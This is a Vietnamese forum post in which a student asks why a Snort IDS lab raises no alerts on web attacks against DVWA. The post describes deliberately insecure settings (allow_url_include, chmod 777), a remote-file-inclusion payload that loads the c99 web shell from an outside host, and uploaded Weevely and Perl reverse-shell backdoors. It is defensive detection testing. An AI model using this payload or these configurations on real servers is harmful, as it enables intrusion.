Chào các anh chị,
Em đang làm đề tài về snort IDS đã cài đặt snort+ base baryard2 theo hướng dẫn http://www.snort.org/assets/158/snortinstallguide293.pdf và pulledpork để tự động cập nhật rules đã thành công.
Kiểm tra thử khi tấn công lỗi MS067_08netapi thì snort cảnh báo
Nhưng khi kiểm tra phần web attack thì snort ko hiện cảnh báo nào hết.
Phần web em cài dvwa trên webserver, chỉnh sửa allow_url_include=On trong file /etc/php5/apache2/php.ini chmod 777 /var/www/dvwa/hackable/uploads
Sử dụng tấn công RFI thực thi shell c99.php: ?page=http://ipaddress/c99.php
với trong phần upload có upload các file backdoor: Weevely, sử dụng Perl Reverse Shell các kiểu
Tất cả đều attack thành công nhưng snort ko phát hiện được tấn công. Chỉ phát hiện mỗi tấn công windows XP
Em tìm trong rules vẫn thấy có malware C99 nhưng ko hiểu sao snort ko detect được.
Mong các anh chị tư vấn giúp. Em cảm ơn
|
![[Rule]](/hvaonline/templates/viet/images/icon_mini_rule.gif "[Rule]"){kind=icon}
![[Home]](/hvaonline/templates/viet/images/icon_mini_groups.gif "[Home]"){kind=icon}
![[Portal]](/hvaonline/templates/viet/images/icon_mini_portal.gif "[Portal]"){kind=icon}
![[Members]](/hvaonline/templates/viet/images/icon_mini_members.gif "[Members]"){kind=icon}
![[Statistics]](/hvaonline/templates/viet/images/icon_mini_stats.gif "[Statistics]"){kind=icon}
![[Search]](/hvaonline/templates/viet/images/icon_mini_search.gif "[Search]"){kind=icon}
![[Reading Room]](/hvaonline/templates/viet/images/icon_mini_book.gif "[Reading Room]"){kind=icon}
![[Register]](/hvaonline/templates/viet/images/icon_mini_register.gif "[Register]"){kind=icon}
Register![[Login]](/hvaonline/templates/viet/images/icon_mini_login.gif "[Login]"){kind=icon}
Login [
